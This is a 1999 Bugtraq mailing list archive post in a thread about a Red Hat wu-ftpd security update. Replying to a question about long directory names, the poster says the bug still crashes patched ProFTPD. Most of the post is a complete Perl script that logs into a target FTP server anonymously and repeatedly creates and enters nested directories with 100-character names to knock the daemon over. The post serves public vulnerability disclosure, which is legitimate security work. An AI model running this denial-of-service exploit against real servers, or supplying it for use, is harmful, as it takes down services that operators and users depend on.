Bugtraq mailing list archives
Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available
From: jkwilli2 () UNITY NCSU EDU (Ken Williams)
Date: Thu, 11 Feb 1999 18:49:37 -0500
On Thu, 11 Feb 1999, Ronald Wahl wrote:
Date: Thu, 11 Feb 1999 00:12:04 +0100 From: Ronald Wahl <rwahl () GMX NET> To: BUGTRAQ () netspace org Subject: Re: SECURITY: new wu-ftpd packages available (fwd) On Tue, 9 Feb 1999, RHS Linux User wrote:---------- Forwarded message ---------- Date: Tue, 9 Feb 1999 18:20:51 -0500 (EST) From: Cynthia Dale <silly () redhat com> To: cdale () home isolnet com Subject: SECURITY: new wu-ftpd packages available (fwd) fnord. ---------- Forwarded message ---------- Date: Tue, 9 Feb 1999 17:34:10 -0500 From: Bill Nottingham <notting () redhat com> Reply-To: redhat-watch-list () redhat com To: redhat-watch-list () redhat com Subject: SECURITY: new wu-ftpd packages available Resent-Date: 9 Feb 1999 22:56:28 -0000 Resent-From: redhat-watch-list () redhat com Resent-cc: recipient list not shown: ; A security vulnerability has been identified in all versions of the wu-ftpd server binary shipped with Red Hat Linux. For more information, see http://www.netect.com/advisory_0209.html New packages are available for Red Hat Linux 4.2, 5.0, 5.1, and 5.2. All users of Red Hat Linux are encouraged to upgrade to the new wu-ftpd releases immediately. As always, these packages have been signed with the Red Hat PGP key.Is it possible that the bug is not fixed yet? mkdir <verylongname> let the deamon do funny things. Can someone reproduce this? ron -- \ Ronald Wahl --- rwahl () gmx net \ Gib Gates keine Chance! / \ WWW: http://www.tu-chemnitz.de/~row/ \ / \ Talk: rwa () goliath csn tu-chemnitz de \ Pinguine schuetzen. / \ PGP key available \ /
hi, yes, kills patched ProFTPD dead. -----snip----- #!/usr/local/bin/perl # ftpd thingy # bubba () bubba org # $login="ftp"; #duh $pass="ftp\@ftp.com"; #ditto $cdstart="incoming"; #dir with write access to start making new dirs $length=100; #length of dir names $numdirs="15"; #number of dirs to create ######################################################################### $ARGC=@ARGV; if ($ARGC !=1) { print "Usage: $0 <host>\n"; exit; } use Socket; $string="x" x $length; my($remote,$port,$iaddr,$paddr,$proto,$line); $remote=$ARGV[0]; $port = "21"; $iaddr = inet_aton($remote) or die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) or die "Error: $!"; $proto = getprotobyname('tcp') or die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!"; connect(SOCK, $paddr) or die "Error: $!"; $count=$numdirs; while ($count--) { if ($count==$numdirs-1) { $msg = "user $login\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; $msg = "pass $pass\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; $msg = "cwd $cdstart\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; } elsif ($count==1) { $msg = "pwd\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; $msg = "quit\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; } else { $msg = "mkd $string\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; $msg = "cwd $string\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; $msg = "pwd\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; } } while (<SOCK>) { print; } exit; -----snip----- Ken Williams jkwilli2 () csc ncsu edu Packet Storm Security http://packetstorm.genocide2600.com/ Trinux: Linux Security Toolkit http://www.trinux.org/ ftp://ftp.trinux.org PGP DH/DSS/RSA Public Keys http://packetstorm.genocide2600.com/pgpkey/ E.H.A.P. VP & Head of Operations http://www.ehap.org/ tattooman () ehap org NCSU Computer Science http://www.csc.ncsu.edu/ jkwilli2 () csc ncsu edu
Current thread:
- Re: Microsoft Access 97 Stores Database Password as Plaintext, (continued)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Fernald, Brian (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Sozni (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Ervin Fried (Feb 05)
- Re: Microsoft Access 97 Stores Database Password as Plaintext sozni () USA NET (Feb 08)
- Pine _again_ :) Chris Evans (Feb 08)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Stephen M. Milton (Feb 08)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Jim Paris (Feb 09)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Jim Paris (Feb 09)
- SECURITY: new wu-ftpd packages available (fwd) RHS Linux User (Feb 09)
- Re: SECURITY: new wu-ftpd packages available (fwd) Ronald Wahl (Feb 10)
- Pro/wuFTPD DoS (Was: Re: SECURITY: new wu-ftpd packages available Ken Williams (Feb 11)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Billy Naylor (Feb 12)
- Re: Microsoft Access 97 Stores Database Password as Plaintext Ian Smith (Feb 12)
- Applets listening on Sockets in Java Tim Wright (Feb 12)
- Applets listening on Sockets in Java Lincoln Stein (Feb 13)
- Re: Applets listening on Sockets in Java Tim Wright (Feb 15)